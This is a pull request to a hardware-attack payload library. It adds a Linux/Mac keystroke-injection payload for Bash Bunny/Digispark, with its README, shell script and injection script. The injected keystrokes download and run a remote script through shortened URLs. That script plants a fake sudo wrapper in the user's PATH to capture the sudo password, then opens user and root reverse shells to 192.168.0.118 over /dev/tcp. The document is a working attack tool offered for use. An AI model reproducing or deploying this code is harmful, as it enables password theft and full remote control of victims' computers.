### PR TITLE
New Remote access payload

### DIFF
--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
@@ -1,0 +1,3 @@
+# Root_Reverse_Shell_linux_mac
+
+

--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
@@ -1,3 +1,20 @@
 # Root_Reverse_Shell_linux_mac
 
+## Since i dont have a bash bunny i only have digispark, i have converted this script to bash bunny
+## If any issues put in git i will fix it
 
+## POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
+
+## Special thanks to sudobackdoor for bash script sample
+
+## Dont forgot to change IP in payload.sh
+
+## Before using this payload don't forgot to start netcat listeners on port 4444 and 1337
+## Because it gives both user shell and root shell
+
+When bash bunny executes payload in a machine wich is neither linux nor mac, it will download the payload.sh from server
+then executes it and removes the payload.sh.
+
+Once the payload.sh is executed as explained in the sudobackdoor script it will gets the root credential instead of storing it it will used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also.
+
+The reason for two netcat connection is user level connection established when script is executed. But to obtain root credenitals it requires time because the user need elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established.

--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
@@ -1,16 +1,16 @@
 # Root_Reverse_Shell_linux_mac
 
 ### Since i dont have a bash bunny i only have digispark, i have converted this script to bash bunny
-## If any issues put in git i will fix it
+### If any issues put in git i will fix it
 
-## POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
+### POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
 
-## Special thanks to sudobackdoor for bash script sample
+### Special thanks to sudobackdoor for bash script sample
 
-## Dont forgot to change IP in payload.sh
+### Dont forgot to change IP in payload.sh
 
-## Before using this payload don't forgot to start netcat listeners on port 4444 and 1337
-## Because it gives both user shell and root shell
+### Before using this payload don't forgot to start netcat listeners on port 4444 and 1337
+### Because it gives both user shell and root shell
 
 When bash bunny executes payload in a machine wich is neither linux nor mac, it will download the payload.sh from server
 then executes it and removes the payload.sh.

--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
@@ -2,10 +2,8 @@
 
 ### Since i dont have a bash bunny this is tested in digispark
 ### I have converted this script to bash bunny
-### If any issues put in git i will fix it
-
+### If any issues put in discussion i will fix it
 POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
-
 ### Special thanks to sudobackdoor for bash script sample
 Dont forgot to change IP in payload.sh
 Before using this payload don't forgot to start netcat listeners on port 4444 and 1337

--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
@@ -1,16 +1,15 @@
 # Root_Reverse_Shell_linux_mac
 
-### Since i dont have a bash bunny i only have digispark, i have converted this script to bash bunny
+### Since i dont have a bash bunny this is tested in digispark
+### I have converted this script to bash bunny
 ### If any issues put in git i will fix it
 
-### POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
+POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
 
 ### Special thanks to sudobackdoor for bash script sample
-
-### Dont forgot to change IP in payload.sh
-
-### Before using this payload don't forgot to start netcat listeners on port 4444 and 1337
-### Because it gives both user shell and root shell
+Dont forgot to change IP in payload.sh
+Before using this payload don't forgot to start netcat listeners on port 4444 and 1337
+Because it gives both user shell and root shell
 
 When bash bunny executes payload in a machine wich is neither linux nor mac, it will download the payload.sh from server
 then executes it and removes the payload.sh.

--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
@@ -1,6 +1,6 @@
 # Root_Reverse_Shell_linux_mac
 
-## Since i dont have a bash bunny i only have digispark, i have converted this script to bash bunny
+### Since i dont have a bash bunny i only have digispark, i have converted this script to bash bunny
 ## If any issues put in git i will fix it
 
 ## POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-

--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
@@ -1,0 +1,55 @@
+#!/bin/bash
+
+if [ ! -d ~/.config/sudo ]
+then
+    mkdir -p ~/.config/sudo
+fi
+
+if [ -f  ~/.config/sudo/sudo ]
+then
+    rm  ~/.config/sudo/sudo
+fi
+
+
+echo '#!'$SHELL >> ~/.config/sudo/sudo
+cat <<'EOF' >> ~/.config/sudo/sudo
+/usr/bin/sudo -n true 2>/dev/null
+if [ $? -eq 0 ]
+then
+    /usr/bin/sudo $@
+else
+    echo -n "[sudo] password for $USER: "
+    read -s pwd
+    echo
+    echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
+    if [ $? -eq 1 ]
+    then
+    echo "Sorry, try again."
+	sudo $@
+    else
+	/usr/bin/sudo -S $@
+	if [ -f ~/.bash_profile ]
+    then
+    rm ~/.bash_profile
+    mv ~/.darkbash ~/.bash_profile
+    else
+    rm ~/.bashrc
+    mv ~/.darkbashrc ~/.bashrc
+    fi
+    rm ~/.config/sudo/sudo
+    echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i  > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) &
+    fi
+fi
+EOF
+
+chmod u+x ~/.config/sudo/sudo
+if [ -f ~/.bash_profile ]
+then
+    cp ~/.bash_profile ~/.darkbash
+    echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
+else
+    cp ~/.bashrc ~/.darkbashrc
+    echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
+fi
+disown !$ $(/bin/bash -i  > /dev/tcp/192.168.0.118/4444 0<&1 2>&1) &
+bash

--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
@@ -1,0 +1,67 @@
+#!/bin/bash
+
+# Since i dont have a bash bunny i only have digispark, i have converted this script to bash bunny
+# If any issues put in git i will fix it
+
+#POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
+
+# Special thanks to sudobackdoor for bash script sample
+
+# Dont forgot to change IP in payload.sh
+
+
+# Title:         Linux/Mac Reverse Shell
+# Author:        Darkprince(Sridhar)
+# Version:       1.0
+#
+# Runs a script in the background that gives a user shell initially and waits for user to
+# escalate privileges and give a root reverse shell
+#
+# Magenta..................Setup
+# Red,Green,Blue......Executing
+# Green....................Finished
+
+#Before using this payload don't forgot to start netcat listeners on port 4444 and 1337
+#Because it gives both user shell and root shell
+
+# INITIALIZING
+LED M
+# Mac keyboard works in linux and mac
+ATTACKMODE  HID VID_0X05AC PID_0X021E
+
+LANGUAGE='us'
+
+# ATTACKING
+LED R G B
+
+#Get linux,mac Termial
+RUN UNITY xterm
+QUACK DELAY 1000
+#To close opened window by linux run command
+QUACK GUI Q
+RUN OSX terminal
+QUACK DELAY 1000
+
+#If linux then clearing 'terminal' which is typed by mac run script
+QUACK BACKSPACE
+QUACK BACKSPACE
+QUACK BACKSPACE
+QUACK BACKSPACE
+QUACK BACKSPACE
+QUACK BACKSPACE
+QUACK BACKSPACE
+QUACK BACKSPACE
+
+# Downloading bash script from server and Executing bash script which is same for mac and linux
+QUACK SRTING curl http://SERVER_IP/payload.sh -o payload.sh && bash payload.sh && rm payload.sh
+QUACK DELAY 200
+QUACK ENTER
+
+# The cleanup process will done by bash script
+# Closing the xterm in linux
+QUACK STRING exit
+# Closing the terminal in mac even if terminal has other process COMMAND Q and ENTER key will terminates terminal
+QUACK GUI Q
+QUACK ENTER
+
+LED G

--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
@@ -22,34 +22,29 @@ LANGUAGE='us'
 # ATTACKING
 LED R G B
 
-#Get linux,mac Termial
+# Get linux,mac Termial
 RUN UNITY xterm
-QUACK DELAY 1000
-#To close opened window by linux run command
-QUACK GUI Q
+Q DELAY 1000
+# To close opened window by linux run command
+Q GUI Q
+Q CTRL C
 RUN OSX terminal
-QUACK DELAY 1000
+Q DELAY 1000
 
-#If linux then clearing 'terminal' which is typed by mac run script
-QUACK BACKSPACE
-QUACK BACKSPACE
-QUACK BACKSPACE
-QUACK BACKSPACE
-QUACK BACKSPACE
-QUACK BACKSPACE
-QUACK BACKSPACE
-QUACK BACKSPACE
+# If linux then clearing 'terminal' which is typed by mac run script
+Q CTRL C
 
 # Downloading bash script from server and Executing bash script which is same for mac and linux
-QUACK SRTING curl -L https://shorturl.at/tHIW7 -o payload.sh && bash payload.sh && rm payload.sh
-QUACK DELAY 1000
-QUACK ENTER
+Q SRTING curl -L http://bit.do/bunnybash -o payload.sh && bash payload.sh && rm payload.sh
+Q DELAY 3000
+Q ENTER
 
 # The cleanup process will done by bash script
 # Closing the xterm in linux
-QUACK STRING exit
 # Closing the terminal in mac even if terminal has other process COMMAND Q and ENTER key will terminates terminal
-QUACK GUI Q
-QUACK ENTER
+Q GUI Q
+Q CTRL C
+Q STRING exit
+Q ENTER
 
 LED G

--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
@@ -1,15 +1,5 @@
 #!/bin/bash
 
-# Since i dont have a bash bunny i only have digispark, i have converted this script to bash bunny
-# If any issues put in git i will fix it
-
-#POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
-
-# Special thanks to sudobackdoor for bash script sample
-
-# Dont forgot to change IP in payload.sh
-
-
 # Title:         Linux/Mac Reverse Shell
 # Author:        Darkprince(Sridhar)
 # Version:       1.0
@@ -21,8 +11,6 @@
 # Red,Green,Blue......Executing
 # Green....................Finished
 
-#Before using this payload don't forgot to start netcat listeners on port 4444 and 1337
-#Because it gives both user shell and root shell
 
 # INITIALIZING
 LED M

--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
@@ -41,8 +41,8 @@ QUACK BACKSPACE
 QUACK BACKSPACE
 
 # Downloading bash script from server and Executing bash script which is same for mac and linux
-QUACK SRTING curl http://SERVER_IP/payload.sh -o payload.sh && bash payload.sh && rm payload.sh
-QUACK DELAY 200
+QUACK SRTING curl -L https://shorturl.at/tHIW7 -o payload.sh && bash payload.sh && rm payload.sh
+QUACK DELAY 1000
 QUACK ENTER
 
 # The cleanup process will done by bash script

--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
@@ -1,5 +1,3 @@
-#!/bin/bash
-
 # Title:         Linux/Mac Reverse Shell
 # Author:        Darkprince(Sridhar)
 # Version:       1.0


### PR DESCRIPTION
Hi i have developed a payload for bash bunny, which works on mac linux without any switching or editing the payload.
This payload has the capability to grant a user and root shell to pentester. But it was tested only in digispark attiny 85. Because i don't have a bashbunny. Even i have converted the script to bashbunny form.
I have added poc video in my README.md file please check it. I hope it worthier enough to put in bash bunny payloads.
Contact me on : sridharas04@gmail.com
I love hak5 and it's cool gadgets. Thank you.